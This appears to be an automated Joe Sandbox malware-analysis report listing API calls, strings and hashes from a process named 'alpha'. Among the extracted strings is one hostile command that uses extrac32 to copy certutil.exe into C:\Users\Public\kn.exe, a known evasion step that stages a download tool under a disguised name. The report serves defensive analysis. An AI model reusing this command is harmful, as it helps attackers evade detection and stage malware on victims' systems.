                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AA19E2270978686EF21EB21DC603FAA391FF48799F904135DA4D4B695DF3CE646C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$EnvironmentVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DIRCMD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1405722092-1465291664
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c55531eb54789366c3258dd2569913d9856292727ababeaf9ab1e689f2bac408
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0814B72A18BC18AEB20EF20AC902EE77A4FF48748F945139DB8D57B58DF38D2458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,?,00007FF706EB99DD), ref: 00007FF706EB9A39
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBDF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF706EBCEAA), ref: 00007FF706EBDFB8
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBDF60: RtlFreeHeap.NTDLL ref: 00007FF706EBDFCC
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBDF60: _setjmp.MSVCRT ref: 00007FF706EBE03E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,?,00007FF706EB99DD), ref: 00007FF706EB9AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,?,00007FF706EB99DD), ref: 00007FF706EB9B0F
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB96E8: memset.MSVCRT ref: 00007FF706EB97B2
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB96E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF706EB9880
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 00007FF706ECB844
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcscmp.MSVCRT ref: 00007FF706ECB86D
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: FOR$ IF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3663254013-2924197646
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 533edc6cc318995531ec2aff9f209e43a9e783e6cbda5aeae4b7c31cbe4a1832
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8518B21F0974381EE14BB259C7127BA6A1BF49BA4FC85635DA1E477D5DF3CE8028720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF0D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF1BA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF1E7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF1FF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF2BB
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswdigit$iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: )$=,;
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1959970872-2167043656
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7184e7db3019b64e42f27e06f11d0d61442684acb06a435cad359ad972d31f00
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC41BFA5E0875386FB646B15AD3437BF6E0BF10755FC4A235CE8D421A4DF3CA8868720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %04X-%04X$:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 930873262-1938371929
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d809683f12e4d1075b1d81adeaa20de2c7894a178e76150d0756c35653e0da82
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A416E65A08B82D2EB20BB60EC612BBE2A0FF88754FC58135DA5E436D5DF3CE5458760
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
• String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
APIs
• iswdigit.MSVCRT(?,?,00000000,00007FF706EC68A3,?,?,?,?,?,?,?,00000000,?,00007FF706EC63F3), ref: 00007FF706EC6A73
• wcschr.MSVCRT(?,?,00000000,00007FF706EC68A3,?,?,?,?,?,?,?,00000000,?,00007FF706EC63F3), ref: 00007FF706EC6A91
• wcschr.MSVCRT(?,?,00000000,00007FF706EC68A3,?,?,?,?,?,?,?,00000000,?,00007FF706EC63F3), ref: 00007FF706EC6AB0
• wcschr.MSVCRT(?,?,00000000,00007FF706EC68A3,?,?,?,?,?,?,?,00000000,?,00007FF706EC63F3), ref: 00007FF706EC6AE3
• wcschr.MSVCRT(?,?,00000000,00007FF706EC68A3,?,?,?,?,?,?,?,00000000,?,00007FF706EC63F3), ref: 00007FF706EC6B01
Strings
Similarity
• API ID: wcschr$iswdigit
• String ID: +-~!$<>+-*/%()|^&=,
APIs
Similarity
• API ID: File_get_osfhandle$Pointer$BuffersFlushRead
• String ID:
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF706EC14D6,?,?,?,00007FF706EBAA22,?,?,?,00007FF706EB847E), ref: 00007FF706EC1673
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF706EC14D6,?,?,?,00007FF706EBAA22,?,?,?,00007FF706EB847E), ref: 00007FF706EC168D
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF706EC14D6,?,?,?,00007FF706EBAA22,?,?,?,00007FF706EB847E), ref: 00007FF706EC1757
• HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF706EC14D6,?,?,?,00007FF706EBAA22,?,?,?,00007FF706EB847E), ref: 00007FF706EC176E
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF706EC14D6,?,?,?,00007FF706EBAA22,?,?,?,00007FF706EB847E), ref: 00007FF706EC1788
• HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF706EC14D6,?,?,?,00007FF706EBAA22,?,?,?,00007FF706EB847E), ref: 00007FF706EC179C
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$Alloc$Size
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3586862581-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1313749407-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 920682188-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF706EBE00B
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess_setjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 777023205-3344945345
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 53a0a4433051f8b2f785c66eb16cb0a63c9f7616d80db91828768e717dce03b3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98513970D0DB4286FB14AB15ACA017BFAA0BF68790FD95536D94E823A5DF3CA4408720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF1BA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF1E7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF1FF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF2BB
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswdigit$iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: )$=,;
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1959970872-2167043656
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3e186912945701bb13f2fec769cbc268c3c0a8c6c3280107b7ee1e855c71e695
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88419AA4E0875786FB647B14AD3827BFAA0BF20745FC4A236C98D421A4DF3CA8458661
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmpfprintfwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3625580822-2781220306
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 35a3eac17c1534fbe81d43c19aca6fd19ba72e3bcdd2e9bd35e4d3e11767db97
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8831A125A0874682EA14BB42BD201BBF2A4BF55B98FC85134DE1D177D6EF3CE445C360
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memsetwcsspn
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3809306610-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3c1ac224328112a7378df654f5699de352bf9cf411d9ff9ce1b7eeaceb00e96a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCB19F62A08B4686EA50EB19EC7027BA7A0FF54B90FC58031DA4E47795DF7DE942C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$iswdigit$wcstol
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3841054028-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a0ed074c9a73614b2b916fca6f8c5ae93700137042c462b923e8755c54c764fe
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2451F626A0875281E724AB159C201BBB6A5FF68754FCD8232DF5D472D4EF3CE451C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706ED3687
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF706EB260D), ref: 00007FF706ED36A6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF706EB260D), ref: 00007FF706ED36EB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706ED3703
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF706EB260D), ref: 00007FF706ED3722
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Write_get_osfhandle$Mode
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1066134489-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1aa8fb8d4516f8d76984f3f9ed3e018e4f1ed24fc801c9c3e1088435ddfa6839
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F519A66B0874297EA24AF21AC2417BE691FF45B94F8C8535DF1A07B90DF3CE4418A21
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 850181435-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a2dfd22914faaee84c5ebf64896b17a8da57df17c6a2113f2e9396a5a78d2c2f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1418F32608BC1CAE7609F20DC542EBB7A4FF89B49F945125DA4D4BB48CF38D546CB10
APIs
  • Part of subcall function 00007FF706EC3578: _get_osfhandle.MSVCRT ref: 00007FF706EC3584
  • Part of subcall function 00007FF706EC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC359C
